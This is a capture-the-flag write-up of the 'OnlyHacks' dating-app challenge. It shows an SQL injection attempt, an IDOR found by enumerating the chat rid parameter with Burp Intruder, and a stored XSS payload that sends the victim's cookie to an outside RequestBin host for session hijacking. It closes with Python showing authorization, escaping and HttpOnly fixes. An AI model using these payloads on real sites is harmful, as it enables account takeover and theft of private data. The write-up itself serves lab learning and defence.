Write-up
Step-by-step guide on the approach taken to pwn the machine.
Objective
In this machine, the goal is to "find the flag."
Reconnaissance
The first thing we do is navigate to the URL provided by HackTheBox:
http://83.136.250.243:49280
Upon entering, we are greeted with a login form. Our first attempt is to perform a SQL Injection (SQLI).
We input the following into the username field:
admin' OR+1=1-- -
However, we are redirected back, so we decide to try creating an account instead.
Exploitation
After creating an account, we notice that we are taken to a profile page with the name Etela. The application appears to be a dating platform, similar to Tinder, and the URL changes to:
/dashboard
We start interacting with the application by liking all the profiles. After the fourth profile, no more profiles appear. At this point, we decide to check the "matches" section.
It turns out that we have a match with Renata, and there is already a message. What catches our attention is the URL:
http://83.136.250.243:49280/chat/?rid=6
Could this be an Insecure Direct Object Reference (IDOR) vulnerability? We test changing the rid parameter from 6 to other numbers.
IDOR with Burp Suite
This looks promising. We use Burp Suite Intruder to automate the attack. First, we create a Python script to generate the first 100 integers into a file:
sudo vim 1to100.py
with open("1to100.txt", "w") as file:
    for i in range(101):
        file.write(f"{i}\n")
print("The list of numbers has been saved to '1to100.txt'.")
Explanation:
with open("1to100.txt", "w") as file: opens the file 1to100.txt for writing, creating it if it doesn't exist.
for i in range(101): loops through the numbers from 0 to 100.
file.write(f"{i}\n"): writes each number to the file followed by a newline.
After running the script:
python3 1to100.py
We now have the 1to100.txt file ready to use in Burp Suite.
Setting Up Burp Suite Intruder
We intercept the GET request for the chat URL using Burp Suite.
Open Burp Suite and go to the Proxy tab.
With intercept activated, we reload the page in Firefox (ensure FoxyProxy is configured properly).
Right-click on the request and select Send to Intruder.
In the Intruder tab, we configure the attack:
We set the payload position to replace the rid parameter by selecting it in the request.
Choose the Sniper attack type.
Under Payload Configuration, we load our previously generated 1to100.txt file.
Click Start Attack.
Analyzing Result
As the attack runs, we see the results updating in real-time. To make it easier to identify relevant responses, we sort by Status code.
Only two of the requests return status code 200:
The first is rid=6, which corresponds to our own chat.
The second is rid=3, which looks promising. We navigate to the following URL:
http://83.136.250.243:49280/chat/?rid=3
Here, we find the flag!
Additional Exploits: Cookie and JavaScript Injection
While this concludes the challenge, there’s something else worth testing. Upon inspecting the requests, we see a session cookie is sent.
We decide to send Renata a message and observe the response. Interestingly, Renata replies with a generic message, but we try injecting HTML into the message to see how the application handles it.
To our surprise, the application processes the HTML and JS and responds. We now attempt a JavaScript injection:
<script>document.location='http://requestbin.whapi.cloud/?c=' + document.cookie</script>
We use RequestBin to capture the request. After sending the message, we are redirected to the RequestBin URL, and it shows an ok status.
We refresh the RequestBin page and see that the cookies are now logged. We copy Renata’s cookie.
To confirm the correct cookie, we open the console in the browser and execute:
document.cookie
This gives us our own cookie. We replace it with Renata’s cookie, then reload the OnlyHacks page.
The flag is now visible!
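Both findings above come down to missing server-side controls: the chat lookup trusts the client-supplied rid, message text is rendered as HTML, and the session cookie is readable from JavaScript. The following is an added example (not code from the challenge or from this write-up) showing the object-level authorization check, output escaping and cookie flags that would have closed them; the Chat data model, user ids and sample values are constructed assumptions.

```python
import html
from dataclasses import dataclass, field


@dataclass
class Chat:
    rid: int
    participants: frozenset   # ids of the two matched users
    messages: list = field(default_factory=list)


# Constructed sample data (not from the challenge): user 10 is our account,
# user 11 is the match; chat 6 is ours, chat 3 belongs to two other users.
CHATS = {
    6: Chat(6, frozenset({10, 11}), ["hey, nice profile"]),
    3: Chat(3, frozenset({20, 21}), ["FLAG{placeholder}"]),
}


def get_chat_vulnerable(current_user: int, rid: int):
    """Looks the chat up by the client-supplied rid alone, so any logged-in
    user can read any chat by changing the number (the IDOR above)."""
    return CHATS.get(rid)


def get_chat_secure(current_user: int, rid: int):
    """Object-level authorization: return the chat only if the requester is
    one of its participants; otherwise answer as if it did not exist."""
    chat = CHATS.get(rid)
    if chat is None or current_user not in chat.participants:
        return None   # the HTTP handler maps this to 404/403
    return chat


def render_message(text: str) -> str:
    """Escape message text before it is placed in HTML, so a <script>
    payload is displayed literally instead of run in the recipient's browser."""
    return html.escape(text, quote=True)


def session_cookie_header(value: str) -> str:
    """Set-Cookie value with HttpOnly, so document.cookie cannot read the
    session even if a script did run; Secure and SameSite limit leakage further."""
    return f"session={value}; HttpOnly; Secure; SameSite=Lax; Path=/"


if __name__ == "__main__":
    print(get_chat_vulnerable(10, 3).messages)   # the other users' chat leaks
    print(get_chat_secure(10, 3))                # None
    print(render_message("<b>hi</b>"))           # &lt;b&gt;hi&lt;/b&gt;
```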